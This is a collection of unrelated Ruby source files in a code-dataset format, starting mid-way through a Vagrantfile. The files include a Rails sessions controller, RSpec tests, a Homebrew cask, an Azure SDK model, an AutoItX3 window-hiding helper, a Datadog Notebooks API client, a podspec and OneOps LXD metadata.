ip: \"#{webserver_ip_address}\"", "config.vm.network :forwarded_port, guest: 80, host: 8080"].join("\n") # Pass an attribute to the webserver cookbook to to tell it how many app servers we will provision attribute ['vagrant-deploy-goapp-ngnix', 'num_of_app_servers'], num_appservers attribute ['vagrant-deploy-goapp-ngnix', 'base_ip_prefix'], baseip_prefix attribute ['vagrant-deploy-goapp-ngnix', 'base_ip_address'], baseip_address # Define which Chef cookbook we want to run on the box # webserver will install nginx and configure it to load balance requests to the # defined number of app servers run_list ['recipe[webserver::default]'] end end
39.175439
188
0.729512
79be2c23d5b00ad2bc74b9ecdc5a66f1c0087e81
1,000
class SessionsController < ApplicationController def home end def create @user = User.find_by(email: params[:user][:email]) if @user && @user.authenticate(params[:user][:password]) session[:user_id] = @user.id flash[:notice] = "Sucessfully logged in!" redirect_to user_path(@user) else flash[:alert] = "Invalid credentials, please try again" redirect_to "/login" end end def google_auth @user = User.find_or_create_by(email: auth['info']['email']) do |u| u.name = auth['info']['name'] u.password = SecureRandom.hex end if @user.save session[:user_id] = @user.id redirect_to user_path(@user) else redirect_to '/' end end def destroy session.clear redirect_to root_path end private def auth request.env['omniauth.auth'] end end
22.727273
75
0.546
e973fd5979bdcd1ddae944a64cf906ec8c891e56
2,951
#-- copyright # OpenProject is a project management system. # Copyright (C) 2012-2015 the OpenProject Foundation (OPF) # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License version 3. # # OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows: # Copyright (C) 2006-2013 Jean-Philippe Lang # Copyright (C) 2010-2013 the ChiliProject Team # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. # # See doc/COPYRIGHT.rdoc for more details. #++ require 'spec_helper' require 'roar/decorator' describe OpenProject::Plugins::ActsAsOpEngine do subject(:engine) do Class.new(Rails::Engine) do include OpenProject::Plugins::ActsAsOpEngine end end it { is_expected.to respond_to(:name) } it { is_expected.to respond_to(:patches) } it { is_expected.to respond_to(:assets) } it { is_expected.to respond_to(:additional_permitted_attributes) } it { is_expected.to respond_to(:register) } describe '#name' do before do Object.const_set('SuperCaliFragilisticExpialidocious', engine) end describe '#name' do subject { super().name } it { is_expected.to eq 'SuperCaliFragilisticExpialidocious' } end end describe '#extend_api_response' do xit 'should lookup and extend an existing Decorator' do # This test does not work as intended... # The actual work done by :extend_api_response is not performed unless the engine is started # However, it would be green because all attributes of the represented are magically added # to the representer... module API module VTest module WorkPackages class WorkPackageRepresenter < ::Roar::Decorator property :bar end end end end represented_clazz = Struct.new(:foo, :bar) representer = API::VTest::WorkPackages::WorkPackageRepresenter.new(represented_clazz.new) engine.class_eval do extend_api_response(:v_test, :work_packages, :work_package) do property :foo end end expect(representer.to_json).to have_json_path('represented/foo') expect(representer.to_json).to have_json_path('represented/bar') end end end
33.91954
98
0.714334
f8b563bff8e8604453e7103410c3e9945cb20972
1,146
cask '[email protected]' do version '2018.3.4f1,1d952368ca3a' sha256 :no_check url "https://download.unity3d.com/download_unity/1d952368ca3a/MacEditorTargetInstaller/UnitySetup-Facebook-Games-Support-for-Editor-2018.3.4f1.pkg" name 'Facebook Gameroom Build Support' homepage 'https://unity3d.com/unity/' pkg 'UnitySetup-Facebook-Games-Support-for-Editor-2018.3.4f1.pkg' depends_on cask: '[email protected]' preflight do if File.exist? "/Applications/Unity" FileUtils.move "/Applications/Unity", "/Applications/Unity.temp" end if File.exist? "/Applications/Unity-2018.3.4f1" FileUtils.move "/Applications/Unity-2018.3.4f1", '/Applications/Unity' end end postflight do if File.exist? '/Applications/Unity' FileUtils.move '/Applications/Unity', "/Applications/Unity-2018.3.4f1" end if File.exist? '/Applications/Unity.temp' FileUtils.move '/Applications/Unity.temp', '/Applications/Unity' end end uninstall quit: 'com.unity3d.UnityEditor5.x', delete: '/Applications/Unity-2018.3.4f1/PlaybackEngines/Facebook' end
31.833333
149
0.719895
1d12eb25e5ebe3965e2d042ed4049b3ab6a2a0de
1,906
require 'spec_helper' RSpec.describe Information, :type => :model do it "url" do information = create :information expect(information.url).to eq("#{Settings.host}/information/#{information.id}") end it "belongs to coupon and favorited" do coupon = create :coupon, count: 0 expect(coupon.information.is_coupon_taken?).to eq(true) end it "soft delete" do scrip = create :scrip information = scrip.information expect(Information.count).to eq(1) expect(information.is_destroyed?).to eq(false) information.soft_delete expect(Information.count).to eq(0) expect(Information.unscoped.count).to eq(1) information.reload expect(information.is_destroyed?).to eq(true) end it "soft delete | delete favorite" do scrip = create :scrip create :favorite, information: scrip.information expect(Favorite.count).to eq(1) scrip.information.soft_delete expect(Favorite.count).to eq(0) end it "soft delete | delete comments of scrip" do scrip = create :scrip create :comment, scrip: scrip information = scrip.information expect(scrip.comments.count).to eq(1) information.soft_delete expect(scrip.comments.count).to eq(0) end it "increase and decrease count" do information = create :information expect(information.comments_count).to eq(0) information.increase_for :comments_count expect(information.comments_count).to eq(1) information.decrease_for :comments_count expect(information.comments_count).to eq(0) end it "could not decrease below 0" do information = create :information expect(information.comments_count).to eq(0) information.increase_for :comments_count expect(information.comments_count).to eq(1) information.decrease_for :comments_count information.decrease_for :comments_count expect(information.comments_count).to eq(0) end end
30.741935
83
0.726653
4a85f94cfb8904899fbcf6f2d98f589963b252c9
119
require 'test_helper' class ShapeTest < ActiveSupport::TestCase # test "the truth" do # assert true # end end
14.875
41
0.697479
bfd6d615800f1daf0ce808ba27da61acb8c9ea0f
999
require 'json' filename = 'callnumber_map.properties' callnumbers = {} callhierarchy = {} line_num=0 text=File.open(filename).read text.each_line do |line| if line_num >= 4 vals = line.split("=") #puts vals.to_s if(vals.length == 2) key = vals[0].strip callnumbers[key] = vals[1].strip.gsub("\n","") #if key has length 2, and matching parent key does not exist, then create parent key if(key.length == 1 && ! callhierarchy.key?(key)) callhierarchy[key] = [] end if(key.length >= 2) keyprefix = key[0..0] if(! callhierarchy.key?(keyprefix)) callhierarchy[keyprefix] = [] end keyval = key[0..1] if ! callhierarchy[keyprefix].include?(keyval) callhierarchy[keyprefix] << keyval end end end end line_num += 1 end callkeys = callnumbers.keys #callkeys.each do |key| #end puts callnumbers.to_json puts "hierarchy" puts callhierarchy.to_json
23.785714
90
0.606607
621a901bc098c0bcaa927e0b37b14a8edc1bd11d
362
class RemoveOldPaymentColumnsFromCommunity < ActiveRecord::Migration[5.2] def change remove_column :communities, :commission_from_seller, :integer, after: :vat remove_column :communities, :vat, :integer, after: :facebook_connect_enabled remove_column :communities, :testimonials_in_use, :boolean, after: :minimum_price_cents, default: true end end
45.25
106
0.79558
289cfd64a738303bdabb1eeda9a836c049f654b3
7,649
# encoding: utf-8 # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. module Azure::Network::Mgmt::V2020_08_01 module Models # # Private endpoint resource. # class PrivateEndpoint < Resource include MsRestAzure # @return [ExtendedLocation] The extended location of the load balancer. attr_accessor :extended_location # @return [Subnet] The ID of the subnet from which the private IP will be # allocated. attr_accessor :subnet # @return [Array<NetworkInterface>] An array of references to the network # interfaces created for this private endpoint. attr_accessor :network_interfaces # @return [ProvisioningState] The provisioning state of the private # endpoint resource. Possible values include: 'Succeeded', 'Updating', # 'Deleting', 'Failed' attr_accessor :provisioning_state # @return [Array<PrivateLinkServiceConnection>] A grouping of information # about the connection to the remote resource. attr_accessor :private_link_service_connections # @return [Array<PrivateLinkServiceConnection>] A grouping of information # about the connection to the remote resource. Used when the network # admin does not have access to approve connections to the remote # resource. attr_accessor :manual_private_link_service_connections # @return [Array<CustomDnsConfigPropertiesFormat>] An array of custom dns # configurations. attr_accessor :custom_dns_configs # @return [String] A unique read-only string that changes whenever the # resource is updated. attr_accessor :etag # # Mapper for PrivateEndpoint class as Ruby Hash. # This will be used for serialization/deserialization. # def self.mapper() { client_side_validation: true, required: false, serialized_name: 'PrivateEndpoint', type: { name: 'Composite', class_name: 'PrivateEndpoint', model_properties: { id: { client_side_validation: true, required: false, serialized_name: 'id', type: { name: 'String' } }, name: { client_side_validation: true, required: false, read_only: true, serialized_name: 'name', type: { name: 'String' } }, type: { client_side_validation: true, required: false, read_only: true, serialized_name: 'type', type: { name: 'String' } }, location: { client_side_validation: true, required: false, serialized_name: 'location', type: { name: 'String' } }, tags: { client_side_validation: true, required: false, serialized_name: 'tags', type: { name: 'Dictionary', value: { client_side_validation: true, required: false, serialized_name: 'StringElementType', type: { name: 'String' } } } }, extended_location: { client_side_validation: true, required: false, serialized_name: 'extendedLocation', type: { name: 'Composite', class_name: 'ExtendedLocation' } }, subnet: { client_side_validation: true, required: false, serialized_name: 'properties.subnet', type: { name: 'Composite', class_name: 'Subnet' } }, network_interfaces: { client_side_validation: true, required: false, read_only: true, serialized_name: 'properties.networkInterfaces', type: { name: 'Sequence', element: { client_side_validation: true, required: false, serialized_name: 'NetworkInterfaceElementType', type: { name: 'Composite', class_name: 'NetworkInterface' } } } }, provisioning_state: { client_side_validation: true, required: false, read_only: true, serialized_name: 'properties.provisioningState', type: { name: 'String' } }, private_link_service_connections: { client_side_validation: true, required: false, serialized_name: 'properties.privateLinkServiceConnections', type: { name: 'Sequence', element: { client_side_validation: true, required: false, serialized_name: 'PrivateLinkServiceConnectionElementType', type: { name: 'Composite', class_name: 'PrivateLinkServiceConnection' } } } }, manual_private_link_service_connections: { client_side_validation: true, required: false, serialized_name: 'properties.manualPrivateLinkServiceConnections', type: { name: 'Sequence', element: { client_side_validation: true, required: false, serialized_name: 'PrivateLinkServiceConnectionElementType', type: { name: 'Composite', class_name: 'PrivateLinkServiceConnection' } } } }, custom_dns_configs: { client_side_validation: true, required: false, serialized_name: 'properties.customDnsConfigs', type: { name: 'Sequence', element: { client_side_validation: true, required: false, serialized_name: 'CustomDnsConfigPropertiesFormatElementType', type: { name: 'Composite', class_name: 'CustomDnsConfigPropertiesFormat' } } } }, etag: { client_side_validation: true, required: false, read_only: true, serialized_name: 'etag', type: { name: 'String' } } } } } end end end end
33.995556
84
0.469473
626827e26329dd96f2aa85e666d72dc5c6173719
2,297
# An instance of this class represents an AutoItX3 WIN32OLE server. class AutoItX3 HIDING_TIMEOUT = 10 # in seconds BROWSER_WINDOW_NAME = 'YouTube - Google Chrome' SW_HIDE = 0 SW_SHOW = 5 def initialize @server = WIN32OLE.new('AutoItX3.Control') # set matching option for window title, 2 is match substring, 3 is match exact, 1 is match from the beginning @server.opt('WinTitleMatchMode', 3) end # Find the browser handler, and hide it. def hide_browser # acquire window handler if needed if(!@browser_handler) acquire_browser_handler() end @server.WinSetState(@browser_handler, '', SW_HIDE) end # Shows the browser if it's hidden. Is supposed that @browser_handler was already acquired. def show_browser @server.WinSetState(@browser_handler, '', SW_SHOW) end def hide_chromedriver_console # acquire window handler if needed if(!@chromedriver_console_handler) acquire_chromedriver_console_handler() end @server.WinSetState(@chromedriver_console_handler, '', SW_HIDE) end private # Force the acquirement of the corresponding @browser_handler. Ovewrite existing if exists. def acquire_browser_handler # priority is to hide it quicker as you can if(@server.WinWait(BROWSER_WINDOW_NAME, '', HIDING_TIMEOUT) == 1) # connection has been made, get handler pseudo_handle = @server.WinGetHandle(BROWSER_WINDOW_NAME) @browser_handler = "[HANDLE:#{pseudo_handle}]" #: String else # connection couldn't be made raise(RuntimeError, "AutoItX3 can't find '#{BROWSER_WINDOW_NAME}' window.") end end # Force the acquirement of the corresponding @chromedriver_console_handler. Ovewrite existing if exists. def acquire_chromedriver_console_handler # priority is to hide it quicker as you can if(@server.WinWait((window_name = "#{YouTubePlayer::TARGET_CHROMEDRIVER_PLACEMENT.gsub('/', '\\')}\\chromedriver.exe"), '', HIDING_TIMEOUT) == 1) # connection has been made, get handler pseudo_handle = @server.WinGetHandle(window_name) @chromedriver_console_handler = "[HANDLE:#{pseudo_handle}]" #: String else # connection couldn't be made raise(RuntimeError, "AutoItX3 can't find '#{window_name}' window.") end end end
35.890625
149
0.719634
91e23ae2c7f93ca6e355dba30855c44287ac2912
2,543
module Fog module Compute class AzureRM # Real class for Compute Request class Real def list_managed_disks_in_subscription msg = 'Listing all Managed Disks' Fog::Logger.debug msg begin managed_disks = @compute_mgmt_client.disks.list rescue MsRestAzure::AzureOperationError => e raise_azure_exception(e, msg) end Fog::Logger.debug 'Managed Disks listed successfully.' managed_disks end end # Mock class for Compute Request class Mock def list_managed_disks_in_subscription disks = [ { 'accountType' => 'Standard_LRS', 'properties' => { 'osType' => 'Windows', 'creationData' => { 'createOption' => 'Empty' }, 'diskSizeGB' => 10, 'encryptionSettings' => { 'enabled' => true, 'diskEncryptionKey' => { 'sourceVault' => { 'id' => '/subscriptions/{subscriptionId}/resourceGroups/myResourceGroup/providers/Microsoft.KeyVault/vaults/myVMVault' }, 'secretUrl' => 'https://myvmvault.vault-int.azure-int.net/secrets/{secret}' }, 'keyEncryptionKey' => { 'sourceVault' => { 'id' => '/subscriptions/{subscriptionId}/resourceGroups/myResourceGroup/providers/Microsoft.KeyVault/vaults/myVMVault' }, 'keyUrl' => 'https://myvmvault.vault-int.azure-int.net/keys/{key}' } }, 'timeCreated' => '2016-12-28T02:46:21.3322041+00:00', 'provisioningState' => 'Succeeded', 'diskState' => 'Unattached' }, 'type' => 'Microsoft.Compute/disks', 'location' => 'westus', 'tags' => { 'department' => 'Development', 'project' => 'ManagedDisks' }, 'id' => '/subscriptions/{subscriptionId}/resourceGroups/myResourceGroup/providers/Microsoft.Compute/disks/myManagedDisk1', 'name' => 'myManagedDisk1' } ] disk_mapper = Azure::Profiles::Latest::Compute::Models::DiskList.mapper @compute_mgmt_client.deserialize(disk_mapper, disks, 'result.body').value end end end end end
37.955224
140
0.506095
7914e1e470faa1654dd4bd33ab471826023ba1c5
18,183
=begin #Datadog API V1 Collection #Collection of all Datadog Public endpoints. The version of the OpenAPI document: 1.0 Contact: [email protected] Generated by: https://openapi-generator.tech Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License. This product includes software developed at Datadog (https://www.datadoghq.com/). Copyright 2020-Present Datadog, Inc. =end require 'cgi' module DatadogAPIClient::V1 class NotebooksAPI attr_accessor :api_client def initialize(api_client = APIClient.default) @api_client = api_client end # Create a notebook # Create a notebook using the specified options. # @param body [NotebookCreateRequest] The JSON description of the notebook you want to create. # @param [Hash] opts the optional parameters # @return [NotebookResponse] def create_notebook(body, opts = {}) data, _status_code, _headers = create_notebook_with_http_info(body, opts) data end # Create a notebook # Create a notebook using the specified options. # @param body [NotebookCreateRequest] The JSON description of the notebook you want to create. # @param [Hash] opts the optional parameters # @return [Array<(NotebookResponse, Integer, Hash)>] NotebookResponse data, response status code and response headers def create_notebook_with_http_info(body, opts = {}) if @api_client.config.unstable_operations.has_key?(:create_notebook) unstable_enabled = @api_client.config.unstable_operations[:create_notebook] if unstable_enabled @api_client.config.logger.warn format("Using unstable operation '%s'", "create_notebook") else raise APIError.new(message: format("Unstable operation '%s' is disabled", "create_notebook")) end end if @api_client.config.debugging @api_client.config.logger.debug 'Calling API: NotebooksAPI.create_notebook ...' end # verify the required parameter 'body' is set if @api_client.config.client_side_validation && body.nil? fail ArgumentError, "Missing the required parameter 'body' when calling NotebooksAPI.create_notebook" end # resource path local_var_path = '/api/v1/notebooks' # query parameters query_params = opts[:query_params] || {} # header parameters header_params = opts[:header_params] || {} # HTTP header 'Accept' (if needed) header_params['Accept'] = @api_client.select_header_accept(['application/json']) # HTTP header 'Content-Type' header_params['Content-Type'] = @api_client.select_header_content_type(['application/json']) # form parameters form_params = opts[:form_params] || {} # http body (model) post_body = opts[:debug_body] || @api_client.object_to_http_body(body) # return_type return_type = opts[:debug_return_type] || 'NotebookResponse' # auth_names auth_names = opts[:debug_auth_names] || [:apiKeyAuth, :appKeyAuth] new_options = opts.merge( :operation => :create_notebook, :header_params => header_params, :query_params => query_params, :form_params => form_params, :body => post_body, :auth_names => auth_names, :return_type => return_type ) data, status_code, headers = @api_client.call_api(:POST, local_var_path, new_options) if @api_client.config.debugging @api_client.config.logger.debug "API called: NotebooksAPI#create_notebook\nData: #{data.inspect}\nStatus code: #{status_code}\nHeaders: #{headers}" end return data, status_code, headers end # Delete a notebook # Delete a notebook using the specified ID. # @param notebook_id [Integer] Unique ID, assigned when you create the notebook. # @param [Hash] opts the optional parameters # @return [nil] def delete_notebook(notebook_id, opts = {}) delete_notebook_with_http_info(notebook_id, opts) nil end # Delete a notebook # Delete a notebook using the specified ID. # @param notebook_id [Integer] Unique ID, assigned when you create the notebook. # @param [Hash] opts the optional parameters # @return [Array<(nil, Integer, Hash)>] nil, response status code and response headers def delete_notebook_with_http_info(notebook_id, opts = {}) if @api_client.config.unstable_operations.has_key?(:delete_notebook) unstable_enabled = @api_client.config.unstable_operations[:delete_notebook] if unstable_enabled @api_client.config.logger.warn format("Using unstable operation '%s'", "delete_notebook") else raise APIError.new(message: format("Unstable operation '%s' is disabled", "delete_notebook")) end end if @api_client.config.debugging @api_client.config.logger.debug 'Calling API: NotebooksAPI.delete_notebook ...' end # verify the required parameter 'notebook_id' is set if @api_client.config.client_side_validation && notebook_id.nil? fail ArgumentError, "Missing the required parameter 'notebook_id' when calling NotebooksAPI.delete_notebook" end # resource path local_var_path = '/api/v1/notebooks/{notebook_id}'.sub('{' + 'notebook_id' + '}', CGI.escape(notebook_id.to_s)) # query parameters query_params = opts[:query_params] || {} # header parameters header_params = opts[:header_params] || {} # HTTP header 'Accept' (if needed) header_params['Accept'] = @api_client.select_header_accept(['application/json']) # form parameters form_params = opts[:form_params] || {} # http body (model) post_body = opts[:debug_body] # return_type return_type = opts[:debug_return_type] # auth_names auth_names = opts[:debug_auth_names] || [:apiKeyAuth, :appKeyAuth] new_options = opts.merge( :operation => :delete_notebook, :header_params => header_params, :query_params => query_params, :form_params => form_params, :body => post_body, :auth_names => auth_names, :return_type => return_type ) data, status_code, headers = @api_client.call_api(:DELETE, local_var_path, new_options) if @api_client.config.debugging @api_client.config.logger.debug "API called: NotebooksAPI#delete_notebook\nData: #{data.inspect}\nStatus code: #{status_code}\nHeaders: #{headers}" end return data, status_code, headers end # Get a notebook # Get a notebook using the specified notebook ID. # @param notebook_id [Integer] Unique ID, assigned when you create the notebook. # @param [Hash] opts the optional parameters # @return [NotebookResponse] def get_notebook(notebook_id, opts = {}) data, _status_code, _headers = get_notebook_with_http_info(notebook_id, opts) data end # Get a notebook # Get a notebook using the specified notebook ID. # @param notebook_id [Integer] Unique ID, assigned when you create the notebook. # @param [Hash] opts the optional parameters # @return [Array<(NotebookResponse, Integer, Hash)>] NotebookResponse data, response status code and response headers def get_notebook_with_http_info(notebook_id, opts = {}) if @api_client.config.unstable_operations.has_key?(:get_notebook) unstable_enabled = @api_client.config.unstable_operations[:get_notebook] if unstable_enabled @api_client.config.logger.warn format("Using unstable operation '%s'", "get_notebook") else raise APIError.new(message: format("Unstable operation '%s' is disabled", "get_notebook")) end end if @api_client.config.debugging @api_client.config.logger.debug 'Calling API: NotebooksAPI.get_notebook ...' end # verify the required parameter 'notebook_id' is set if @api_client.config.client_side_validation && notebook_id.nil? fail ArgumentError, "Missing the required parameter 'notebook_id' when calling NotebooksAPI.get_notebook" end # resource path local_var_path = '/api/v1/notebooks/{notebook_id}'.sub('{' + 'notebook_id' + '}', CGI.escape(notebook_id.to_s)) # query parameters query_params = opts[:query_params] || {} # header parameters header_params = opts[:header_params] || {} # HTTP header 'Accept' (if needed) header_params['Accept'] = @api_client.select_header_accept(['application/json']) # form parameters form_params = opts[:form_params] || {} # http body (model) post_body = opts[:debug_body] # return_type return_type = opts[:debug_return_type] || 'NotebookResponse' # auth_names auth_names = opts[:debug_auth_names] || [:apiKeyAuth, :appKeyAuth] new_options = opts.merge( :operation => :get_notebook, :header_params => header_params, :query_params => query_params, :form_params => form_params, :body => post_body, :auth_names => auth_names, :return_type => return_type ) data, status_code, headers = @api_client.call_api(:GET, local_var_path, new_options) if @api_client.config.debugging @api_client.config.logger.debug "API called: NotebooksAPI#get_notebook\nData: #{data.inspect}\nStatus code: #{status_code}\nHeaders: #{headers}" end return data, status_code, headers end # Get all notebooks # Get all notebooks. This can also be used to search for notebooks with a particular `query` in the notebook `name` or author `handle`. # @param [Hash] opts the optional parameters # @option opts [String] :author_handle Return notebooks created by the given &#x60;author_handle&#x60;. # @option opts [String] :exclude_author_handle Return notebooks not created by the given &#x60;author_handle&#x60;. # @option opts [Integer] :start The index of the first notebook you want returned. # @option opts [Integer] :count The number of notebooks to be returned. # @option opts [String] :sort_field Sort by field &#x60;modified&#x60; or &#x60;name&#x60;. (default to 'modified') # @option opts [String] :sort_dir Sort by direction &#x60;asc&#x60; or &#x60;desc&#x60;. (default to 'desc') # @option opts [String] :query Return only notebooks with &#x60;query&#x60; string in notebook name or author handle. # @option opts [Boolean] :include_cells Value of &#x60;false&#x60; excludes the &#x60;cells&#x60; and global &#x60;time&#x60; for each notebook. (default to true) # @return [NotebooksResponse] def list_notebooks(opts = {}) data, _status_code, _headers = list_notebooks_with_http_info(opts) data end # Get all notebooks # Get all notebooks. This can also be used to search for notebooks with a particular &#x60;query&#x60; in the notebook &#x60;name&#x60; or author &#x60;handle&#x60;. # @param [Hash] opts the optional parameters # @option opts [String] :author_handle Return notebooks created by the given &#x60;author_handle&#x60;. # @option opts [String] :exclude_author_handle Return notebooks not created by the given &#x60;author_handle&#x60;. # @option opts [Integer] :start The index of the first notebook you want returned. # @option opts [Integer] :count The number of notebooks to be returned. # @option opts [String] :sort_field Sort by field &#x60;modified&#x60; or &#x60;name&#x60;. # @option opts [String] :sort_dir Sort by direction &#x60;asc&#x60; or &#x60;desc&#x60;. # @option opts [String] :query Return only notebooks with &#x60;query&#x60; string in notebook name or author handle. # @option opts [Boolean] :include_cells Value of &#x60;false&#x60; excludes the &#x60;cells&#x60; and global &#x60;time&#x60; for each notebook. # @return [Array<(NotebooksResponse, Integer, Hash)>] NotebooksResponse data, response status code and response headers def list_notebooks_with_http_info(opts = {}) if @api_client.config.unstable_operations.has_key?(:list_notebooks) unstable_enabled = @api_client.config.unstable_operations[:list_notebooks] if unstable_enabled @api_client.config.logger.warn format("Using unstable operation '%s'", "list_notebooks") else raise APIError.new(message: format("Unstable operation '%s' is disabled", "list_notebooks")) end end if @api_client.config.debugging @api_client.config.logger.debug 'Calling API: NotebooksAPI.list_notebooks ...' end # resource path local_var_path = '/api/v1/notebooks' # query parameters query_params = opts[:query_params] || {} query_params[:'author_handle'] = opts[:'author_handle'] if !opts[:'author_handle'].nil? query_params[:'exclude_author_handle'] = opts[:'exclude_author_handle'] if !opts[:'exclude_author_handle'].nil? query_params[:'start'] = opts[:'start'] if !opts[:'start'].nil? query_params[:'count'] = opts[:'count'] if !opts[:'count'].nil? query_params[:'sort_field'] = opts[:'sort_field'] if !opts[:'sort_field'].nil? query_params[:'sort_dir'] = opts[:'sort_dir'] if !opts[:'sort_dir'].nil? query_params[:'query'] = opts[:'query'] if !opts[:'query'].nil? query_params[:'include_cells'] = opts[:'include_cells'] if !opts[:'include_cells'].nil? # header parameters header_params = opts[:header_params] || {} # HTTP header 'Accept' (if needed) header_params['Accept'] = @api_client.select_header_accept(['application/json']) # form parameters form_params = opts[:form_params] || {} # http body (model) post_body = opts[:debug_body] # return_type return_type = opts[:debug_return_type] || 'NotebooksResponse' # auth_names auth_names = opts[:debug_auth_names] || [:apiKeyAuth, :appKeyAuth] new_options = opts.merge( :operation => :list_notebooks, :header_params => header_params, :query_params => query_params, :form_params => form_params, :body => post_body, :auth_names => auth_names, :return_type => return_type ) data, status_code, headers = @api_client.call_api(:GET, local_var_path, new_options) if @api_client.config.debugging @api_client.config.logger.debug "API called: NotebooksAPI#list_notebooks\nData: #{data.inspect}\nStatus code: #{status_code}\nHeaders: #{headers}" end return data, status_code, headers end # Update a notebook # Update a notebook using the specified ID. # @param notebook_id [Integer] Unique ID, assigned when you create the notebook. # @param body [NotebookUpdateRequest] Update notebook request body. # @param [Hash] opts the optional parameters # @return [NotebookResponse] def update_notebook(notebook_id, body, opts = {}) data, _status_code, _headers = update_notebook_with_http_info(notebook_id, body, opts) data end # Update a notebook # Update a notebook using the specified ID. # @param notebook_id [Integer] Unique ID, assigned when you create the notebook. # @param body [NotebookUpdateRequest] Update notebook request body. # @param [Hash] opts the optional parameters # @return [Array<(NotebookResponse, Integer, Hash)>] NotebookResponse data, response status code and response headers def update_notebook_with_http_info(notebook_id, body, opts = {}) if @api_client.config.unstable_operations.has_key?(:update_notebook) unstable_enabled = @api_client.config.unstable_operations[:update_notebook] if unstable_enabled @api_client.config.logger.warn format("Using unstable operation '%s'", "update_notebook") else raise APIError.new(message: format("Unstable operation '%s' is disabled", "update_notebook")) end end if @api_client.config.debugging @api_client.config.logger.debug 'Calling API: NotebooksAPI.update_notebook ...' end # verify the required parameter 'notebook_id' is set if @api_client.config.client_side_validation && notebook_id.nil? fail ArgumentError, "Missing the required parameter 'notebook_id' when calling NotebooksAPI.update_notebook" end # verify the required parameter 'body' is set if @api_client.config.client_side_validation && body.nil? fail ArgumentError, "Missing the required parameter 'body' when calling NotebooksAPI.update_notebook" end # resource path local_var_path = '/api/v1/notebooks/{notebook_id}'.sub('{' + 'notebook_id' + '}', CGI.escape(notebook_id.to_s)) # query parameters query_params = opts[:query_params] || {} # header parameters header_params = opts[:header_params] || {} # HTTP header 'Accept' (if needed) header_params['Accept'] = @api_client.select_header_accept(['application/json']) # HTTP header 'Content-Type' header_params['Content-Type'] = @api_client.select_header_content_type(['application/json']) # form parameters form_params = opts[:form_params] || {} # http body (model) post_body = opts[:debug_body] || @api_client.object_to_http_body(body) # return_type return_type = opts[:debug_return_type] || 'NotebookResponse' # auth_names auth_names = opts[:debug_auth_names] || [:apiKeyAuth, :appKeyAuth] new_options = opts.merge( :operation => :update_notebook, :header_params => header_params, :query_params => query_params, :form_params => form_params, :body => post_body, :auth_names => auth_names, :return_type => return_type ) data, status_code, headers = @api_client.call_api(:PUT, local_var_path, new_options) if @api_client.config.debugging @api_client.config.logger.debug "API called: NotebooksAPI#update_notebook\nData: #{data.inspect}\nStatus code: #{status_code}\nHeaders: #{headers}" end return data, status_code, headers end end end
43.396181
169
0.683606
5db2e676b00739419723d0461c72aa1a88ab9f9a
1,559
# # Be sure to run `pod lib lint LVPopup.podspec' to ensure this is a # valid spec before submitting. # # Any lines starting with a # are optional, but their use is encouraged # To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html # Pod::Spec.new do |s| s.name = 'LVPopup' s.version = '0.1.0' s.summary = 'A short description of LVPopup.' # This description is used to generate tags and improve search results. # * Think: What does it do? Why did you write it? What is the focus? # * Try to keep it short, snappy and to the point. # * Write the description between the DESC delimiters below. # * Finally, don't worry about the indent, CocoaPods strips it! s.description = <<-DESC TODO: Add long description of the pod here. DESC s.homepage = 'https://github.com/levivig/LVPopup' # s.screenshots = 'www.example.com/screenshots_1', 'www.example.com/screenshots_2' s.license = { :type => 'MIT', :file => 'LICENSE' } s.author = { 'levivig' => '[email protected]' } s.source = { :git => 'https://github.com/levivig/LVPopup.git', :tag => s.version.to_s } # s.social_media_url = 'https://twitter.com/levivig' s.ios.deployment_target = '11.0' s.source_files = 'LVPopup/Classes/**/*' # s.resource_bundles = { # 'LVPopup' => ['LVPopup/Assets/*.png'] # } # s.public_header_files = 'Pod/Classes/**/*.h' s.frameworks = 'UIKit' s.dependency 'SnapKit' s.dependency 'SwifterSwift' end
35.431818
99
0.634381
1c260d4f5a7553b289bd0b100a3ee1e066515efe
2,919
name "Lxd" description "Personal Compute Cloud Service with LXD" version "0.1" maintainer "OneOps" maintainer_email "[email protected]" license "Apache License, Version 2.0" grouping 'default', :access => "global", :packages => [ 'base', 'mgmt.cloud.service', 'cloud.service' ], :namespace => true attribute 'endpoint', :description => "API Endpoint", :required => "required", :default => "", :format => { :help => 'LXD server REST endpoint', :category => '1.Authentication', :order => 1 } attribute 'client_cert', :description => "Client Cert", :data_type => "text", :required => "required", :default => "", :format => { :help => 'Client Certificate (use ~/.config/lxd/client.crt or generate new and use lxc config trust add)', :category => '1.Authentication', :order => 2 } attribute 'client_key', :description => "Client Key", :data_type => "text", :required => "required", :default => "", :format => { :help => 'Client Key (use ~/.config/lxd/client.key or generate new and use lxc config trust add)', :category => '1.Authentication', :order => 3 } attribute 'sizemap', :description => "Sizes Map", :data_type => "hash", :default => '{ "XS":"default","S":"default","M":"default","L":"default","XL":"default" }', :format => { :help => 'Map of generic compute sizes to LXD profiles', :category => '2.Mappings', :order => 1 } attribute 'imagemap', :description => "Images Map", :data_type => "hash", :default => '{"ubuntu-16.04":"ubuntu", "centos-7.0":"centos"}', :format => { :help => 'Map of generic OS image types to provider specific 64-bit OS image types', :category => '2.Mappings', :order => 2 } attribute 'repo_map', :description => "OS Package Repositories keyed by OS Name", :data_type => "hash", :default => '{}', :format => { :help => 'Map of repositories by OS Type containing add commands - ex) yum-config-manager --add-repo repository_url or deb http://us.archive.ubuntu.com/ubuntu/ hardy main restricted ', :category => '4.Operating System', :order => 1 } attribute 'env_vars', :description => "System Environment Variables", :data_type => "hash", :default => '{}', :format => { :help => 'Environment variables - ex) http => http://yourproxy, https => https://yourhttpsproxy, etc', :category => '4.Operating System', :order => 3 } attribute 'ostype', :description => "OS Type", :required => "required", :default => "ubuntu-16.04", :format => { :help => 'OS types are mapped to the correct cloud provider OS images - see provider documentation for details', :category => '4.Operating System', :order => 4, 